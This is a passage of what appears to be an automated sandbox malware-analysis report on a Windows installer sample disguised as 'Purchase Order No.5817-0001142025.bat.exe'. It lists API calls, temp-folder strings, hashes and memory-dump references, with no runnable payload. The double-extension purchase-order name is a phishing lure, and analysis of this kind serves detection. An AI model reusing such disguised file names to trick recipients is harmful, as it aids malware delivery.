                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp$C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp\System.dll
                                                                      • API String ID: 1659193697-3248240693
                                                                      • Opcode ID: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                                      • Instruction ID: 3f04c1712215209208acb7642429b7129ba4cba87377fac841ce35f74c6015ca
                                                                      • Opcode Fuzzy Hash: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                                      • Instruction Fuzzy Hash: DF110A72A40205BBCB00BBB19E4AA9F76A19F50748F21483FF502F61C1DAFD89D1665E
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(000002C4,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C74
                                                                      • CloseHandle.KERNEL32(000002E0,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C88
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp, xrefs: 00403C98
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C67
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp
                                                                      • API String ID: 2962429428-987624802
                                                                      • Opcode ID: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                                      • Instruction ID: 8c071fc62b7e332c461b44292a81ac7d95f2e272703a36c0b89becc6b1ca42eb
                                                                      • Opcode Fuzzy Hash: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                                      • Instruction Fuzzy Hash: C9E04F3140471896D5246F78AE4E9853A185F41335B248326F078F21F0C738995A5AA9
                                                                      APIs
                                                                        • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                                        • Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"), ref: 0040600A
                                                                        • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                                        • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"), ref: 004060B2
                                                                      • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004060C2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp
                                                                      • API String ID: 3248276644-766773280
                                                                      • Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                                      • Instruction ID: c6e62d849c1808a59ce2984a64bb42424f7e4e7bb9f9a1371c2689eace45329e
                                                                      • Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                                      • Instruction Fuzzy Hash: 17F04426144E6219D632723A0C05EAF26148F82354B57463FF853B22D1DF3C8D62C17E
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 004056AA
                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004056FB
                                                                        • Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                                      • Instruction ID: 56d6425d582badedfe6e85af8287ead15e3733fa9de593adb61ce7d3cc062d63
                                                                      • Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                                      • Instruction Fuzzy Hash: 1601B131101608ABDF205F41DE80AAF3A39EB84754F90483BF509761D0D77B8C929E6D
                                                                      APIs
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00421F28,?,00000800,00000000,?,00421F28,?,?,Call,?,00000000,004067C1,80000002), ref: 00406596
                                                                      • RegCloseKey.ADVAPI32(?), ref: 004065A1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue
                                                                      • String ID: Call
                                                                      • API String ID: 3356406503-1824292864
                                                                      • Opcode ID: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                                      • Instruction ID: 225dfe442f4fc2e839130f584d2f70a73ee2f61c7405cac2e0d59c7fe544a8ff
                                                                      • Opcode Fuzzy Hash: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                                      • Instruction Fuzzy Hash: 39017172510209FEDF218F55DD05EDB3BE8EB54364F014035FD1592190E738D968DBA4
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe,C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe,80000000,00000003), ref: 00405FA3
                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe,C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe,80000000,00000003), ref: 00405FB3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 2709904686-1246513382
                                                                      • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                      • Instruction ID: 76a3089014cba6cdede5e63107dce03d3cc6699033e3804c636830b34c248568
                                                                      • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                      • Instruction Fuzzy Hash: D1D05EB2401921DAE3126B04DD00D9F63ACEF12300746482AE840E7161D77C5C8186AD
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060FF
                                                                      • CharNextA.USER32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406110
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                      • Instruction ID: 41d5ee4ea83cc4d308be6584820b02a87ee89e19241337121ce36a8d52a16fb8
                                                                      • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                      • Instruction Fuzzy Hash: 9DF06235504418EFC702DBA9DD00D9EBFA8EF46350B2640B9E841FB211DA74DE11AB99